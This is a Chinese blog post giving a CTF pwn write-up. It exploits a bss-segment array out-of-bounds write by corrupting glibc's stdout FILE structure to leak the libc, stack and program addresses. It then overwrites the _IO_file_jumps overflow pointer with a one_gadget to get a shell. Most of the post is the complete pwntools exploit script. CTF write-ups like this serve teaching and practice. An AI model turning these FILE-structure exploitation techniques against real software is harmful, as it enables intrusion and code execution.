意思篇:全开,bss段数组溢出,打stdout和data数据区域进行读取(很有意思)

最新推荐文章于 2024-08-12 14:11:01 发布
最新推荐文章于 2024-08-12 14:11:01 发布
阅读量587 收藏
点赞数 1
分类专栏: CTF PWN 文章标签: 系统安全 安全 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39948058/article/details/119944507
版权
CTF 同时被 2 个专栏收录
32 篇文章 2 订阅
订阅专栏
PWN
29 篇文章 0 订阅
订阅专栏

前言:这道题我看了一个师傅的wp,发现这道题感觉很有意思,所以这里就记录一下,像标题一样,很有意思,这道题大概就是数组溢出bss,在bss有stdin和stdout,stderr,freehook,溢出打这些东西来完成泄露任意写的目的,最后打freehook的时候,要利用一个_IO_file_jumps ----》io——overflow这个东西溢出到onegadget即可,具体看exp就会明白,这里参考了另一个师傅的exp,非常有参考价值,学到很多东西,嘿嘿

exp:

from pwn import*
#context.log_level = 'DEBUG'
def menu(ch):
    p.sendlineafter('>> ',str(ch))
def adjust(index,size,content):
    menu(2)
    p.sendlineafter('the power: ',str(index))
    p.sendlineafter('size: ',str(size))
    p.sendafter('staff: ',content)
def delete(index):
    menu(3)
    p.sendlineafter('power: ',str(index))
def login():
    menu(2)
    p.sendlineafter('account :','QAQ')
    p.sendafter('password :','rCLQ\n')
p = process('./main')
libc =ELF('./libc-2.29.so')
login()
 
adjust(-6,0,'\x00'*0x17 + '\n')
gdb.attach(p)
p.sendline('2')
p.sendline('-2')
p.sendline('0')
p.sendline('\x00'*0xD8 + p64(0xFBAD1800))
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['_IO_2_1_stdin_'] - 0xD00
log.info('LIBC:\t' + hex(libc_base))
environ = libc_base + libc.sym['environ']
system = libc_base + libc.sym['system']
IO_stdout_off = libc_base + libc.sym['_IO_2_1_stdout_'] + 131
adjust(-6,0,'\x00'*0x18 + p64(environ) + p64(environ + 8) + p64(environ + 8) + p64(IO_stdout_off) + p64(IO_stdout_off + 1)  + '\n')
p.sendline('2')
p.sendline('-2')
p.sendline('0')
p.sendline('\x00'*0xD8 + p64(0xFBAD1800))
 
stack = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00'))
log.info('Stack:\t' + hex(stack))
leak_address = stack - 0x160
adjust(-6,0,'\x00'*0x18 + p64(leak_address) + p64(leak_address + 8) + p64(leak_address + 8) + p64(IO_stdout_off) + p64(IO_stdout_off + 1)  + '\n')
p.sendline('2')
p.sendline('-2')
p.sendline('0')
p.sendline('\x00'*0xD8 + p64(0xFBAD1800))
 
proc_base = u64(p.recv(6).ljust(8,'\x00')) - 0x7040
log.info('Proc:\t' + hex(proc_base))
 
leak_address = proc_base + 0x7000
adjust(-6,0,p64(leak_address)*6 +  p64(leak_address + 2) + p64(leak_address + 9)+ '\n')
p.sendline('2')
p.sendline('-2')
p.sendline('0')
p.sendline('\x00'*0xD8 + p64(0xFBAD1800))
 
IO_overflow = libc_base + libc.sym['_IO_file_jumps'] + 0x18
adjust(-13,0,p64(1) + p64(IO_overflow - 8) + '\n')
adjust(1,0,p64(libc_base + 0x106EF8) + '\n')
p.interactive()

总结:好有意思啊,感觉又学到了。呜呜呜嘿嘿嘿!!!!大佬勿喷哦嘿嘿

jsjsj11123
关注
专栏目录
BSS数据、代码与栈.pdf
09-05
### BSS数据、代码与栈详解 #### 一、BSS **BSS**(Block Started by Symbol)是程序中用于存放未初始化的全局变量的一块内存区域。这类变量通常在程序启动时由操作系统自动设置为零值。BSS的特点...
[每日一PWN]BUUCTF PWN5
qq_55233040的博客
11-28 389
遇到了buu的pwn题中按顺序的第一道格式化字符串漏洞的题目,难度稍有提升。
pwnable brain fuck(bss的用途)
九层台
09-26 672
题目链接传送门 这里题目跟网鼎杯线下赛的一个pwn有些相似。 输入一些字符可以控制一个指针,可以向这个指针指向的地址处写数据。 首先要知道bss里面有什么。 在这道题里面的p指针的更高地址处是stdin,stdout,stderr然后是函数的got表,这里可以控制指针p泄露和修改got表。 #coding=utf-8 from pwn import * p=0x0804a0a0 putcha...
程序的内存布局概述(一)--.bss和.data
最新发布
MHD0815的博客
08-12 1582
在汇编语言中,.bss和.data是两个重要的数据,它们在程序的内存布局中扮演着不同的角色。下面将详细介绍这两个数据的特点和用途。.bss和.data是汇编语言中两个重要的数据,它们分别用于存放未初始化和已初始化的全局变量和静态变量。这两个数据在程序的内存布局中占据不同的位置,并具有各自的特点和优势。了解这两个数据的特点和用途对于编写高效、可靠的汇编程序具有重要意义。.bss.bss(Block Started by Symbol segment)通常用于存储未初始化的全局变量和静态变量。
[Black Watch 入群题]PWN-栈迁移
个人笔记
04-20 470
细节详情参考:https://blog.csdn.net/mcmuyanga/article/details/109260008。buf溢出栈空间只有0x20-0x18=8字节无法构造rop,所以需要利用栈迁移技术,迁移到bss上构造rop。bss栈布局:(左边是第一泄露Libc构造栈帧,右边是第二次重写获取shell的栈帧)改变思路:由于此程序没有可直接ret利用的函数同时溢出空间很小,所以需要。栈迁移操作:构造好栈中ebp新位置。思路:ret2shellcode。栈迁移关键指令:leave。
pwn 练习
zip471642048的博客
05-31 464
文章目录read_shellcode read_shellcode 师傅出的一个栈溢出的题,思路就是利用read往bss写入shellcode然后调用 日常checksec一下,啥都没开 运行主程序可以看出来,程序读入了一个字符串无打印 gdb调试的时候可以看到是调用了plt的read函数,说明他读入字符串是用的read@plt,我们可以用read往栈或者bss写东西,或者利用gadget系统调用 这么几个gadget明显不够,系统调用pass 可以看到栈可以读可写,bss也是
HeapBSS溢出机理分析
weixin_30337157的博客
08-07 831
HeapBSS溢出机理分析 作者:warning3 虽然基于Heap()/BSS溢出现在是相当普遍的,但并没有多少介绍它的资料。本文将帮你理解什么是Heap溢出,也介绍了几种常用的攻击方法,同时给出了一些可能的解决方案。阅读本文,您需要了解一些汇编,C语言以及溢出的基本知识。 一.为什么Heap/BSS溢出很重要? 溢出的问题已经广为人知,越来越多的操作系统商家增加了不可执行...
DSP2数据存储器和程序存储器实验.doc
12-02
DSP2数据存储器和程序存储器实验 数据存储器和程序存储器是DSP(Digital Signal Processor,数字信号处理器)的两大核心组件。数据存储器用于存储数据,而程序存储器用于存储程序代码。在DSP2数据存储器和程序...
Linux内存管理进程所涉及到的五个数据
07-29
对任何一个普通进程来讲,它都会涉及到五种不同的数据,这五种数据分别是:代码数据BSS (heap)和栈。 代码 代码是用来存放可执行文件的操作指令,也就是说它是可执行程序在内存中的镜像。...
五分钟搞定bssdata和rodata的区别 硬件工程师电路分析物联网模电单片机嵌入式技术.doc
09-22
"五分钟搞定bssdata和rodata的区别" 在嵌入式系统中,了解内存的组织方式是非常重要的。特别是对于硬件工程师来说,了解bssdata、rodata和text等概念,对优化程序的运行时间和程序占用空间非常有利。 首先,...
深入C语言内存区域分配(进程的各个)详解
12-26
BSS  未初始化全局变量,未初始化全局静态变量 栈  局部变量、函数参数  动态内存分配 (1)代码(text segment):存放CPU执行的机器指令。通常代码是可共享的,这使得需要频繁被执行的程序只需要在内存...
缓冲区溢出攻击
qq_39249347的博客
07-06 813
程序的内存布局 对于一个典型的C语言程序,它的内存由5个组成,每一个都有不同的用途: 代码:存放程序的可执行代码,这一内存通常是只读的。 数据:存放程序员初始化的静态/全局变量。 BSS:存放未初始化的静态/全局变量。 :用于动态内存分配,这一内存区由malloc()、calloc()、realloc()、free()等函数管理。 栈:用于存放函数内定义的局部变量,或者和函数调用有关的数据,如返回地址和参数。 观察下面这代码: int x = 100; int main() {
[漏洞分析] 栈基础 & 栈溢出 & 栈溢出进阶
Poo_Chai的博客
10-27 1335
[漏洞分析]栈基础 & 栈溢出 & 栈溢出进阶 栈基础 内存四区 代码区(.text):这个区域存储着被装入执行的二进制机器代码,处理器会到这个区域取指令执行。 数据区(.data):用于存储全局变量和静态变量等。 区:动态地分配和回收内存,进程可以在区动态地请求一定大小的内存,并在用...
【转帖】Heap/BSS 溢出机理分析
dragonbooker的专栏
03-08 1104
溢出的问题已经广为人知,越来越多的操作系统商家增加了不可执行栈的补丁,一些个人也提供了自己的补丁,象著名的Solar Designer提供的针对Linux的不可执行栈的kernel patch(目前已经推出了用于2.2.13内核的patch),也有一些人开发了一些编译器来防止溢出,象Crispin Cowan等开发的StackGuard等等。这些方法都一定程度上可以减少由溢出导致的安全问题,但是并却不能防止Heap/BSS溢出。在大多数的操作系统中,Heap和BSS都是可写可执行的。这
Heap/BSS 溢出机理分析
lyc96532的专栏
06-16 2195
<!-- var width = "350"; var border = "1"; var offsetx = 5; var offsety = 5; var fcolor = "#FFFFFF"; var backcolor = "#6699cc"; var backdottedcolor = "#808080"; var textcolor = "
c 程序语言的溢出错误,C语言中溢出错误分析和防范
weixin_35282584的博客
05-18 854
C语言中溢出错误分析和防范溢出错误是编写程序时比较常见的错误,通过对C语言中栈溢出溢出BSS溢出(本文共3页)阅读全文>>一、错误分析理论错误分析于20世纪60年代兴起,这一学科的建立归功于Pit Corder。70年代是错误分析的黄金时代。Pit ...(本文共3页)阅读全文>>在大学英语教学中,翻译能力的培养和提高不仅对听、说、读、写四个方面的发展有良好的促进作用...
#error clnk Debug\XY9-1E.lkf:1 segment .bss size overflow (358)
qq_41205432的博客
10-27 105
文档显示 可以到 最大到 7ff , 不过还有 512 字节的栈 ,慎重修改。如下 将RAM 0x5ff 更改大些,不过需要根据自己的单片机ram大小填写。出现以上内存溢出问题,可以看下所选的STM8 的内存是否设计正确。
C++内存溢出,看高级程序员的解决办法是什么
apple_51669768的博客
12-13 1980
C/C++语言中,内存的分配与回收都是由开发人员在编写代码时主动完成的,好处是内存管理的开销较小,程序拥有更高的执行效率;弊端是依赖于开发者的水平,随着代码规模的扩大,极容易遗漏释放内存的步骤,或者一些不规范的编程可能会使程序具有安全隐患。如果对内存管理不当,可能导致程序中存在内存缺陷,甚至会在运行时产生内存故障错误。 内存泄漏是各类缺陷中十分棘手的一种,对系统的稳定运行威胁较大。当动态分配的内存在程序结束之前没有被回收时,则发生了内存泄漏。由于系统软件,如操作系统、编译器、开发环境等都是由C/C++语言
stvd+stm8l051F3: segment .bss size overflow (293)
Embedded engineer
03-03 711
stm8l051F3使用stvd进行仿真调试时提示如下错误: Running Linker clnk -l"C:\Program Files (x86)\COSMIC\CXSTM8\Lib" -o Debug\stm8l051_sx1278.sm8 -mDebug\stm8l051_sx1278.map Debug\stm8l051_sx1278.lkf #error...
程序内存布局:BSS数据、代码与栈解析
"本资源详细介绍了计算机内存管理中的几个关键部分,包括BSS数据、代码和栈。这些概念对于理解程序的内存布局和执行过程至关重要。" 在计算机程序的内存组织中,有五个主要的部分,它们分别是BSS、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值